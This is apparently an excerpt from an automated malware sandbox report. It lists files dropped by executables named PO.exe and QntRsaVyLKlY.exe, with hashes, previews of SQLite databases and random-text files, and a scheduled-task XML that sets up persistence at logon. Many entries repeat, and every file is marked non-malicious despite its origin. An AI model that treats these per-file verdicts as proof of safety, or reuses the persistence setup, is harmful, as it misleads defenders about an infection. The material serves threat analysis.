                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.704346314649071
                      Encrypted:false
                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                      Malicious:false
                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.697358951122591
                      Encrypted:false
                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                      Malicious:false
                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.696508269038202
                      Encrypted:false
                      SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                      MD5:0E9E92228B27AD7E7B4449467A529B0C
                      SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                      SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                      SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                      Malicious:false
                      Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:XML 1.0 document, ASCII text
                      Category:dropped
                      Size (bytes):1585
                      Entropy (8bit):5.110833937586022
                      Encrypted:false
                      SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtkxvn:cgergYrFdOFzOzN33ODOiDdKrsuT0v
                      MD5:A1FB6FDCFB95458E7BC9B104B5BB4C08
                      SHA1:AEE25208B99AA7735B9F590A9C31605977AC88F5
                      SHA-256:78E2CAB5D6C25F55213ADA042195A6760B9B3B040414ABB124F5EC77B8872D74
                      SHA-512:828994645930D8A1153CFE0A4D81425DC093A4CC9B61260A4D70DDAE4725D65C3199B201BCB6D0FE9B5CBD23E4D4FCDFE0C9A11ABCA589F7A7FD9AE5F048CE9A
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.704346314649071
                      Encrypted:false
                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                      Malicious:false
                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.697358951122591
                      Encrypted:false
                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                      Malicious:false
                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.696508269038202
                      Encrypted:false
                      SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                      MD5:0E9E92228B27AD7E7B4449467A529B0C
                      SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                      SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                      SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                      Malicious:false
                      Preview:PALRGUCVEHIRKBYGKJJWKNMNYKFUTLHCEDOTKTWJCZHNZMOUNMNREQTGFDNZTATQQPDFONRIRAZYJEPXQVIVWNBDQIMKULZMUINYTVUPNMQBQQYLGCAJYFEIWZTWGYTHEJPFBRNGCTANCYOISUQMRINVDUEIROITGPJZCCOVCZIZBHLYBDARSNRLEOQQDWOSMHXNRNBXNWMRVAQZUASARYHEITVTVSLHRGBYURPTEUNAUCYMZTXOZXKDXUEUUVTNGWGSBRAWIJZDVZDLMZBKEVESROLUEDPITQGUXFSRFAVNSESAFZLNXMXUYRFUEUKCMNFITMUQEWTCKEGDPOXHJSXBDLFIOLLHDYIVOQVEYJEZMDIOFXZFCPXJEQLPCSHKUGRQKXAUMKTHUMHWFQZRGBRZHGHYRXRODJXEBANQHOOVFBZXKJHDCAAKHZGSWGKGEDWOOCFCEYHPAQBYBKRXOTJWSCPMRDXNRYAQFQHSHOFCHWJDKTFHACROGLPZFWDCIBJSUTMTRHJKEGAHSBAQLDTWPTXBLVYYBNJBKDUNGOUDVWZOBKOJKSMZERYOYBNMDSYUPHFDPUXOMKCYNSEBJHJVXSWTIMBDLPWYMYMQKYICPQEWMYDUMYJRSVQHDEELUFOEQYUIZBTNUNJNZQTDTIJKNOJNFJDDGEYVGDXTQINCQDGJRRPOBRUHQLMKFJSSNNCQMDHWQYMHWIBVNPHRQCBTMYBSOJYXCUAYTWUDETCJTTEQSPXKTRSQBDJYENXLXJTQIYOZHEFAQOFBXKATTASAWEYGDPTTLZDAFVKRYLRNFSWZYBGUMRHHMNPVCVECBEVWEXNMSCXSGJRAQKAYEIULWHXXFKTJWPDMYUAOSFBKCTNCTQQXTLXIIJKYOPYBMSFGYLZDGOXTVIHYLUMJCRDRQXFLBDAUXBTNAPMACHVQILKZSQLNPPJVGXAXUMTOUMJJJYJSPJALITYYHOOMVVOQNOSSPBLMRBWWPYXB
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.704346314649071
                      Encrypted:false
                      SSDEEP:24:XPzUwxdkbbeZScSZIv3ZoJNWhjcfzkabZsHx:fzUwx4bK+W/+fzuR
                      MD5:8B66CD8FCBCEB253D75DB5CDE6291FA2
                      SHA1:6CE0386190B9753849299B268AA7B8D15F9F72E2
                      SHA-256:51AD0E037F53D8EEDFEBC58112BDFA30796A0A56FBD31B65384B41896489BDB4
                      SHA-512:7C46027769E82ACD4E3ACB038FB80E34792E81B0527AE318194FE22BD066699A86E9B3E55AC5A1BCAC005FE0E8B7FB70B041656DF78BF84983A97CEDAA8861DC
                      Malicious:false
                      Preview:BJZFPPWAPTZISGUNDSDXEATFCUXAGEFCTTZKBNFYFVKDZEMPHZAJNCAVKZWYYNTVOWAJJLGAAUTHJTXJTGQLSVTGXPQIMVSAZAKJXHFSFGEVOJUYTICTQZLJZDQYBUBYFSZSBIOBVSAJCHKIQYCAYMMOZZQCCHGYUFOUMXHXCPNMUMVVZRXZCGPDXYDBBMVMWVPHNHLTQKLDBALGGHIVJYUKXJWAFDLMMQQUEQFWPXRQQODUGQSALTDJTROBSIRXEJYUMIWWHBCANDJZNUJGIKFXUWXKPWKATRJSISRBLFZRNYVGGJJMECDAMBUVQBAZGLVITWWCNZFHKZSKXZCMBCAKDDJCKKLPSOZVUJSWOYBBVEUPDSCKJRFEYGLDGCUHDWDNXCLOHDPVAIFYDTEOJCHJMFFBYBQICVVKCFBQZTCRCDMDLPWOJNYPCOZSCAPIZTHRAONKKSINEYBBWDVGRURGHBALLNKTXIGFWNKLQZPCTSMBRQYVMGXEIBGKILOUERUQSZIKLJQNKDPZJVSDIANCPNMTCRACOINNDAMOQOPAIVLAVJQWKZFANIEXSROWVPTCRRWMWEOIFZXRTNMYBGRZIKPJCTJYJQFKGVOKPTJYXUDCYYOIPMURGGXZGVLUDYKKODERMFIEIWKVSJARDMDMBGKRQHSUCNHMIFNOOKAZIJQSDSIGSBRMCBLXMKFSZZUAJROFXWXYRGSBMDTXFEMBZEMCYBLNRDJBWBOCUMLSOLNUPTETGCYWROACYQSFXBWNHGWPJVQNWAWKUVISCLHXAODXHGTGYBIVDGQQULRMEJMCYHRYXYWXLQTNEIINUCYEPKOEPHTQOQWVAZSBUDRHGYAFVQYNMYCERIVKOVOQNJLBIXTRBDBHNTZPWPYCVFUNIEAVJGCCWWHQQNTFCFYJDTKIZERPJVHSNNBWBOTMBMGRTKDWRLWPSEQAWSWDOFSPSEHOQRGFTQGBAGLJEZFNAHFMRNONCLEXLHXV
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.697358951122591
                      Encrypted:false
                      SSDEEP:24:GllFjmGrUw8wsY1UbsUhBRShwdYjDuvHNeGXNei:WFewtsZZp8DkHzNL
                      MD5:244A1B624BD2C9C3A0D660425CB1F3C6
                      SHA1:FB6C19991CC49A27F0277F54D88B4522F479BE5F
                      SHA-256:E8C5EAACF4D2C4A65761719C311785A7873F0B25D849418ED86BBFE9D7F55C96
                      SHA-512:9875E6DE2ACC859CACC2873F537DDE6ED4EC8CA00CBA3D28535E0440D76FFD475B66C52B6217D311D301C4B9A097619CF29A26B2FD54D03CD27A20A17EC9CA31
                      Malicious:false
                      Preview:GRXZDKKVDBUGJWVAVQNLKHTVWJFMWUAIFGXJYDZTDDYOZYAHDDDHNXHNVSFVZJEMKSJXGDABHWXKQZCQXBMLFZCFZRGZPZWYYNETLMDWOLDLPIFOVKRDMQEWUEHKITHNGNRTRZWQHFMBDECTTQKFDEVNVHBAPCNMCJNWWITPVACWBIUNPCYFZKGJXCMBWDNHDCVDCGEKHYPPPEGKPCPMYZEKRCOGRHDFANVZFDZEKZWOKLRIOUPCTJCKQPECVEEGNTLJWZOKHSKZRNLJEDQLEQNRWIYLSXHSNVGFTCDJOFJSSGANZFCFSTDUPYBCCAPQWVVVHWQMAMBVDQNABQSQOSDYDMOVPXENCAXSTPDCENIQOWPCOQHPSISEOWFKMBLGAZRALPTAYHDZLKJTCHXGTPXNIVUMCOJRZXPUVUFPCWEAEZMMLATLTGHPJIMHWFBUWIATNBBPFGVFXNULJLRYLAGRNCKVAJADSLQGVLGIYOHDIWUERAQSCTFBMXCMLCXSHZGTWPBCVHUYPVAFSBZNBGAGMHGULJYULEEHPGNBGEQRAOPBXXMZIUIPJMFAOVNMZZTOZGOZOJPKWCEFTTAVUBAADATZYJDWSZEZPLDTGYCYWTSDQTIMZHCKMQLZFEYSYUUWFJSYEFNDDKQMZVTBOZLQBDKFHMMKIYQPFKZLTSHIJVNPHPCTWBWPTTKDHDZEMDVWXXBLPWLCSSBMTLIVOVYOKQCJKTYJWGJUBQUGQVBYJQQLLGTHWSPFLDMDWBTOQUISHXBCHIJKAJFIPBNKMWVQGUSJVNKXAXFDNOBYJXMWRDAZWUJSRMMFQXDPYYKOFBEROBQMDZHDZZHOEIOKDOCHQQDQQRHOROOIFAGQEJZJFZIGPJIRWVNQYZAJAHAWIEFFNXLXQWIUWYSGZDFYPCCGWYBBFQQMSMJBRIUPFBWIHWJWVCYOBNNXKIIWTIXOWRVLFBGPGWFQTGPUNWKWUUMQXIKNCLTTGYHBMKXJ
                      Process:C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                      Category:dropped
                      Size (bytes):1026
                      Entropy (8bit):4.696508269038202
                      Encrypted:false
                      SSDEEP:24:RSjVGe9uHEleifrd16Wa05tSl2jFQzpqPMXexMApqIjsp:2Ge9MQ/d16Wjtc2j64Phxjpq82
                      MD5:0E9E92228B27AD7E7B4449467A529B0C
                      SHA1:209F92CDFC879EE2B98DEF315CCE166AFEC00331
                      SHA-256:284937D0EBFEDD95B2347297D957320D8D5CA5FC48218296767069CABA6B14A6
                      SHA-512:CECA5F634268817B4A076414FFAB7D81F93EEC7E7D08B8691CCE0B2BCAF8FC694365455886E36983B4D8D758BC65BC1868BE8DB51AD41E082473726BB1FFD7B8
                      Malicious:false
